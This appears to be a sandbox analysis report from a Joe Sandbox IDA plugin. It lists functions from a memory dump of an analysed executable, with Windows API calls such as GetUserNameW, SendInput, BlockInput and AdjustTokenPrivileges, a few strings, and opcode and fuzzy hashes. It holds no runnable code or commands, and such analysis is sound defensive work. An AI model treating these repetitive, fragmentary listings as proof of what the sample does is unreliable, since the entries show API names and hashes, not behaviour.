Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: a13338226f4e1463696f20c1c32ccd2f5bca4f598ae4c6730894de406d796f45
Instruction ID: a06a0ffde052be720ac62903b1d0535bc6a15ff69b92f30ebc399cc4fb198497
Opcode Fuzzy Hash: a13338226f4e1463696f20c1c32ccd2f5bca4f598ae4c6730894de406d796f45
Instruction Fuzzy Hash: 4DF0F47195030DFBDF01DFE49C89AAEBBBCEB08644F508565E601E2181E778AA448B54

Function 00734CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(007428E9,?,00734CBE,007428E9,007D88B8,0000000C,00734E15,007428E9,00000002,00000000,?,007428E9), ref: 00734D09
TerminateProcess.KERNEL32(00000000,?,00734CBE,007428E9,007D88B8,0000000C,00734E15,007428E9,00000002,00000000,?,007428E9), ref: 00734D10
ExitProcess.KERNEL32 ref: 00734D22

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 587f9d0bcb64feacf17a6f5caa9774471686834c6b9ba6d5a022fae6e187e72b
Instruction ID: f71e474f37f7d0577c0548a2aaf5504297bc068c4a3bdbc9ea5456626bc873f8
Opcode Fuzzy Hash: 587f9d0bcb64feacf17a6f5caa9774471686834c6b9ba6d5a022fae6e187e72b
Instruction Fuzzy Hash: BFE0B631110548FBDF16AF64DD09A593B79EB82781F118014FD099A133CB3DED42CA85

Function 0074C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0074C36C

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 7232e795c27606179e7a50f009a48075a7384c4ed026d0cdcde7ebd87220fce9
Instruction ID: 737a5323a9aad5b4a6c6f8cea4f52533b2d8896c4b376665c67b0e8f2f9a41bf
Opcode Fuzzy Hash: 7232e795c27606179e7a50f009a48075a7384c4ed026d0cdcde7ebd87220fce9
Instruction Fuzzy Hash: D5414772901219AFCB209FB9CC89EBB77B8EB84314F1082A9F905C7180E7749D81CB50

Function 0076D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0076D28C

Strings

X64, xrefs: 0076D2A8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 494fac3842971052d2fca4a7269eb05d02fa0dd167468eb3d23120fe1533d802
Instruction ID: f72d0ec976e44be8fd900533816f1512d22994b5ad2ca17f3e92a5d765834ca4
Opcode Fuzzy Hash: 494fac3842971052d2fca4a7269eb05d02fa0dd167468eb3d23120fe1533d802
Instruction Fuzzy Hash: 34D0CAB481116DEECBA0CBA0EC88DEAB3BCBB04305F104292F506A2000DB789A488F20

Function 0073CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: daae3e6d4a2dbff54cf49b291f8839ea577bbfb18e533db465d9402f8d9dbaf9
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: F2022D72E002199FEF15CFA9C8806ADFBF1EF48314F258169E919F7381D735AA418B90

Function 0071CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#~, xrefs: 0071CF7F
Variable is not of type 'Object'., xrefs: 00760C40

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#~
API String ID: 0-3866028822
Opcode ID: eb610a1f6a6a98865deba8c89dd6acc969febcefcdb5422e9ce7d066b449d6b9
Instruction ID: 9bb3ff8076c1c36e097326131e4496056075bcae88daab8d156064b3d33845e5
Opcode Fuzzy Hash: eb610a1f6a6a98865deba8c89dd6acc969febcefcdb5422e9ce7d066b449d6b9
Instruction Fuzzy Hash: 50328070940218DFCF15DF98D885AEEB7B5FF05304F148059E806AB2D2D779AD86CBA1

Function 007868EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00786918
FindClose.KERNEL32(00000000), ref: 00786961

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 824c8a2bb04a4b028012572a06a8a7410fdb07a2b3ed8054d228fd6f4bf978b6
Instruction ID: 637e530f3fad9467de3aa12b805b9eff45e83af646291ab18d8bb8416a9b5e66
Opcode Fuzzy Hash: 824c8a2bb04a4b028012572a06a8a7410fdb07a2b3ed8054d228fd6f4bf978b6
Instruction Fuzzy Hash: 9E118E71604200AFD710DF69D488A16BBE5FF85328F14C69DE4698F6A2CB38EC45CB91

Function 007837B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00794891,?,?,00000035,?), ref: 007837E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00794891,?,?,00000035,?), ref: 007837F4

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 192a5c8bf6d7f9902f6777c38aa1014f84ac4dfedd3ade1708f3bb0794917752
Instruction ID: 9e25effdb0cc1a91e4dbf5f7a34d88a463d1f46c90f752d66f75e622daa19a71
Opcode Fuzzy Hash: 192a5c8bf6d7f9902f6777c38aa1014f84ac4dfedd3ade1708f3bb0794917752
Instruction Fuzzy Hash: 1FF0EC706052147AD71027794C4DFDB369DEFC5B61F000275F505D22C1D9749944C7B0

Function 0077B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0077B25D
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0077B270

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 636b5af045a3ca469cc033cf41a700b0eec0e909264a9e96989fd3ce56041af1
Instruction ID: 3a82427765ddae691a036731353a69b65502cea8e43467958376d625109ca565
Opcode Fuzzy Hash: 636b5af045a3ca469cc033cf41a700b0eec0e909264a9e96989fd3ce56041af1
Instruction Fuzzy Hash: C2F01D7180424DABDF059FA0C805BBE7BB4FF09309F10C009F955A5192C37D86119F98

Function 007710BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007711FC), ref: 007710D4
CloseHandle.KERNEL32(?,?,007711FC), ref: 007710E9

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 3700517481fcbf6752649c48492dd09ec174043b1e956581ba1f653a5c718d22
Instruction ID: 87c8f9bc81b1ab12f6e6c824503114ca8c6864d0cd184aa0a67b87fb9717aceb
Opcode Fuzzy Hash: 3700517481fcbf6752649c48492dd09ec174043b1e956581ba1f653a5c718d22
Instruction Fuzzy Hash: A4E04F32004610FEEB262B11FC09E7377A9EF04310B10C82DF4A6804B1DB666C90DB54

Function 0074676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00746766,?,?,00000008,?,?,0074FEFE,00000000), ref: 00746998

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 70b4a4e4b461d8a138d0c5ba0b7c8f1543a90893c78c0c1db1a1b1613ece04d3
Instruction ID: 7ae972dcdc914ef9c67f1d5c013db30c36c3acfa136c903ca9ebf6ec8c41be89
Opcode Fuzzy Hash: 70b4a4e4b461d8a138d0c5ba0b7c8f1543a90893c78c0c1db1a1b1613ece04d3
Instruction Fuzzy Hash: ABB13A71610608DFD719CF28C48AB657BE0FF46364F25C658E899CF2A2C339E991CB41

Function 0072B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0076851F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 19bba0cb93b2f0ec7d3eb8e7ec8c916e8382cd43b6dfa3238b19e5df71313222
Instruction ID: cf08e47dcb5e5b5d909b0b1fed935b0b451a0f5847a6a15bb03ee41766231c96
Opcode Fuzzy Hash: 19bba0cb93b2f0ec7d3eb8e7ec8c916e8382cd43b6dfa3238b19e5df71313222
Instruction Fuzzy Hash: 4E124071900229DFCB54DF58D880AEEB7F5FF48710F14819AE849EB255EB389E81CB91

Function 0078EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0078EABD

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 6916a5b826447627815c10868500bbaec976fcac7505d3e6be37ccfe5010cf55
Instruction ID: f25727e56b4a2aa9b75f43b1a001027f99e19c04d0618a56d7a973812295c804
Opcode Fuzzy Hash: 6916a5b826447627815c10868500bbaec976fcac7505d3e6be37ccfe5010cf55
Instruction Fuzzy Hash: 18E01A32240204AFC710EF59D808E9AB7E9AF98B60F04C416FC49C7291DB78E8818B91

Function 007309D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,007303EE), ref: 007309DA

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 993be9517cb20bae495fb910fdc548ca9f7819efee2c491ee7c1bf6a70b0ae6c
Instruction ID: db1a77139aa106494364c2c9db253bd7165492016a29353edf7576696d33badc
Opcode Fuzzy Hash: 993be9517cb20bae495fb910fdc548ca9f7819efee2c491ee7c1bf6a70b0ae6c
Instruction Fuzzy Hash:

Function 0073781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0073798B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: f8191f6f199374d7a7de4d3bb88afd30f1a8f5fdc7f4dc601de2d919780b7f4b
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 2A517BF160C745ABFB3C8568889E7FE63C99B12300F184A09E982DB383C61DEE41D352

Function 00782046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&~, xrefs: 00782053

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID: 0&~
API String ID: 0-2940855197
Opcode ID: d99bda3efd3b98660a66f5769668f672f82ecfdec9c89d466e79d9f1823139bf
Instruction ID: 23a9c30f300783b5595706dec1a54ec2d1ff898a85e86232ecfee897233ffde6
Opcode Fuzzy Hash: d99bda3efd3b98660a66f5769668f672f82ecfdec9c89d466e79d9f1823139bf
Instruction Fuzzy Hash: D32108322612108BDB28CE79C81267A73E9A754310F14862EE0A3C77C1DE79A905C784

Function 00746DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9a339bef2efb18e2ada37f51dd80d93e66ee8d36b7876cb01f817cc1e1ed47e
Instruction ID: 22e22bc5b31753577da14bfc814d629730718cce7a124dcdbf0083324ba6bf15
Opcode Fuzzy Hash: c9a339bef2efb18e2ada37f51dd80d93e66ee8d36b7876cb01f817cc1e1ed47e
Instruction Fuzzy Hash: 64322522D29F414DDB279635CC22335A64DAFB73C5F15D737E81AB59AAEB2DC4838100

Function 0072CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e699f4f1c5674846153a35a5bdbe24d12dea3de762b667191215d5113a896f96
Instruction ID: c1119d207840d97d6aa02c00fb6546fc0faa0234f2570b27361c7a66f0119b3d
Opcode Fuzzy Hash: e699f4f1c5674846153a35a5bdbe24d12dea3de762b667191215d5113a896f96
Instruction Fuzzy Hash: ED321431A001158BDF2ACF68D89467D7BA1EB55300F28816ADCCBDB291E73CDE81DB61

Function 00717920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc45e283238a40438c4aab90623d012d49e31cec7af0159fc3aa07dfdcd4fcb9
Instruction ID: 6df75fee7115c8fcb1ad3a95c0214df383bb5496b31084d9499c01030bdf6364
Opcode Fuzzy Hash: cc45e283238a40438c4aab90623d012d49e31cec7af0159fc3aa07dfdcd4fcb9
Instruction Fuzzy Hash: 4222D2B0A04609DFDF14CF68D895AEEB3F6FF44300F204129E816A7291EB79AD55CB50

Function 007191C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28a3e98a44a43d2aead62a97e4b07309e525b695a3335fe4baebe67538523e18
Instruction ID: 1e97ac94efa82c04c7ad305575cb51394b32ed07f54bb2273f93c29978fecb21
Opcode Fuzzy Hash: 28a3e98a44a43d2aead62a97e4b07309e525b695a3335fe4baebe67538523e18
Instruction Fuzzy Hash: CE02F6B0E00209EBDF04DF64D885AEEB7B5FF44300F108169E9169B291EB79EE55CB91

Function 00731C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 747b0c9e019a034b9de7d67fc5b7c3da95c9e076cf59fd8d8f445c97d31a785a
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 289189732090E34AFB29463E857403EFFE15A523A2B5A079DD4F2CB1C6FE18D954D620

Function 007319B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
